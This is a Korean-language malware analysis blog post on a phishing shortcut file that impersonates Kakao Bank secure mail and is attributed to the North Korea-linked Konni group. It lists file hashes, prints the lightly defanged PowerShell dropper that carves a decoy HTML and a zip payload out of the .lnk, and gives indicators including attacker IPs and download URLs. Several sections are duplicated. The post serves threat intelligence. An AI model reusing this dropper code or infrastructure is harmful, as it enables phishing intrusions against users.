코니(Konni)에서 만든 카카오 보안 메일 사칭 악성 링크 파일-피싱 카카오 뱅크 보안메일 비밀번호.lnk(2023.9.26)
Contents
오늘은 2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 타깃 공격으로 하는 북한의 해킹 단체 Thallium, APT37과 관련된 해킹 단체이며 Kimsuky(김수키)일 가능성도 있는 단체 가능성이 있습니다.일단 오늘 분석을 해볼 악성코드는 카카오에서 보낸 것으로 위장하는 악성코드이며 요즈음 유행하는 링크 방식을 사용하고 있습니다.
먼저 해시 값은 다음과 같습니다.
파일명:피싱 카카오 뱅크 보안메일 비밀번호.lnk.lnk
사이즈:4.44 MB
MD5:7336068f2c5ed3ed154b6c8b1d72726a
SHA-1:e72c90aedd2ef27226d891f464caec19635a6fd3
SHA-256:5a3f1d14b9cc4890db64fbc41818d7039f25b0120574dcdec4e20d13e6b2740c
해당 악성코드를 실행하면 다음과 같은 경로에 파일을 하나 만듭니다.
C:\Users\사용자\AppData\Local\Temp
securityMail_1101(.)html
해당 파워셀(Powershell) 내용은 다음과 같습니다.
c powershell/W 01 $dirPath (=) Get-Location;($)lnkpath (=) Get-ChildItem (-)Path $dirPath -Recurse *(.)lnk ^| where-object {$_.length (-)e(q) 0x0000(4)72AC4} ^| Select-Object -ExpandProperty FullName;(i)f($lnkpath.length -eq 0) {$dirPath = \"$env:temp\";$lnkpath (=) Get(-)Chil(d)Item -Pa(t)h $dir(P)ath -Recur(s)e *(.)lnk ^| where-object {$_.length -eq 0x0(0)00472AC4} ^| Se(l)ect-Object -ExpandProperty FullName;};$pdfFile (=) g(c) $lnkpath (-)Encoding Byte -TotalCount 00091900 -ReadCount 00091900;$pdfPath = \"$env:temp\(s)ecurityMail_1101(.)html\"; s(c) $pdfPath ([byte[]]($pdfFile ^| select -Skip 004386)) -Encoding Byte; ^& $pdfPath;$exeFile (=) g(c) $lnkpath (-)Encoding Byte -TotalCount 04664004 -ReadCount 04664004;$exePath=\ "$env:public\17399(.)zip\";sc $exeP(a)th ([byte[]]($e(x)eFile ^| select -Skip 0009(1)900)) (-)Encoding Byte;$shell = new-obj(e)ct -com shell.application;$(z)ip = …
먼저 해시 값은 다음과 같습니다.
파일명:피싱 카카오 뱅크 보안메일 비밀번호.lnk.lnk
사이즈:4.44 MB
MD5:7336068f2c5ed3ed154b6c8b1d72726a
SHA-1:e72c90aedd2ef27226d891f464caec19635a6fd3
SHA-256:5a3f1d14b9cc4890db64fbc41818d7039f25b0120574dcdec4e20d13e6b2740c
해당 악성코드를 실행하면 다음과 같은 경로에 파일을 하나 만듭니다.
C:\Users\사용자\AppData\Local\Temp
securityMail_1101(.)html
해당 파워셀(Powershell) 내용은 다음과 같습니다.
c powershell/W 01 $dirPath (=) Get-Location;($)lnkpath (=) Get-ChildItem (-)Path $dirPath -Recurse *(.)lnk ^| where-object {$_.length (-)e(q) 0x0000(4)72AC4} ^| Select-Object -ExpandProperty FullName;(i)f($lnkpath.length -eq 0) {$dirPath = \"$env:temp\";$lnkpath (=) Get(-)Chil(d)Item -Pa(t)h $dir(P)ath -Recur(s)e *(.)lnk ^| where-object {$_.length -eq 0x0(0)00472AC4} ^| Se(l)ect-Object -ExpandProperty FullName;};$pdfFile (=) g(c) $lnkpath (-)Encoding Byte -TotalCount 00091900 -ReadCount 00091900;$pdfPath = \"$env:temp\(s)ecurityMail_1101(.)html\"; s(c) $pdfPath ([byte[]]($pdfFile ^| select -Skip 004386)) -Encoding Byte; ^& $pdfPath;$exeFile (=) g(c) $lnkpath (-)Encoding Byte -TotalCount 04664004 -ReadCount 04664004;$exePath=\ "$env:public\17399(.)zip\";sc $exeP(a)th ([byte[]]($e(x)eFile ^| select -Skip 0009(1)900)) (-)Encoding Byte;$shell = new-obj(e)ct -com shell.application;$(z)ip = …
IoC
0e926d8b6fbf6f14a2a19d4d4af843253f9f5f6de337956a12dde279f3321d78
39663e144dc00e3eff004895347a91cb78a6f675
5.8.71.81
5a3f1d14b9cc4890db64fbc41818d7039f25b0120574dcdec4e20d13e6b2740c
7336068f2c5ed3ed154b6c8b1d72726a
8.247.211.254
cb675bbebcc4a77cf5a3b341734b84de
e72c90aedd2ef27226d891f464caec19635a6fd3
http://5.8.71.81:443
http://8.247.211.254:80
http://sfsn.yettiesoft.com/vestmail/vmfile.html
https://naver-file.com:443/download/list.php?q=e1&18467=41
39663e144dc00e3eff004895347a91cb78a6f675
5.8.71.81
5a3f1d14b9cc4890db64fbc41818d7039f25b0120574dcdec4e20d13e6b2740c
7336068f2c5ed3ed154b6c8b1d72726a
8.247.211.254
cb675bbebcc4a77cf5a3b341734b84de
e72c90aedd2ef27226d891f464caec19635a6fd3
http://5.8.71.81:443
http://8.247.211.254:80
http://sfsn.yettiesoft.com/vestmail/vmfile.html
https://naver-file.com:443/download/list.php?q=e1&18467=41